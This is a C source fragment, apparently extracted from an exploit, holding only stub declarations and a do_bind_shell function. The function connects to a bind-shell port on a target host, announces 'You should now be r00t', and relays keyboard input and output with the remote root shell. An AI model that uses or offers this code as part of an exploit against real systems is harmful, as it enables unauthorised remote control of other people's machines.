
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;


 int BINDSHELL_PORT ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 scalar_t__ SIZ ;
 char* buf ;
 int close (int) ;
 int connect_to_host (int ) ;
 char* host ;
 int printf (char*,char*) ;
 int read (int ,char*,scalar_t__) ;
 int recv (int,char*,scalar_t__,int ) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int ) ;
 int strlen (char*) ;

int do_bind_shell()
{
 fd_set rfds;
 int sock,retVal,r;

 if((sock=connect_to_host(BINDSHELL_PORT))==-1)
  return -1;

 printf("[-] Success!!! You should now be r00t on %s\n", host);
 do {
  FD_ZERO(&rfds);
  FD_SET(0, &rfds);
  FD_SET(sock, &rfds);
  retVal=select(sock+1, &rfds, ((void*)0), ((void*)0), ((void*)0));
  if(retVal) {
   if(FD_ISSET(sock, &rfds)) {
    buf[(r=recv(sock, buf, SIZ-1,0))]='\0';
    printf("%s", buf);
   }
   if(FD_ISSET(0, &rfds)) {
    buf[(r=read(0, buf, SIZ-1))]='\0';
    send(sock, buf, strlen(buf), 0);
   }

  }
 } while(retVal && r);

 close(sock);
 return 1;
}
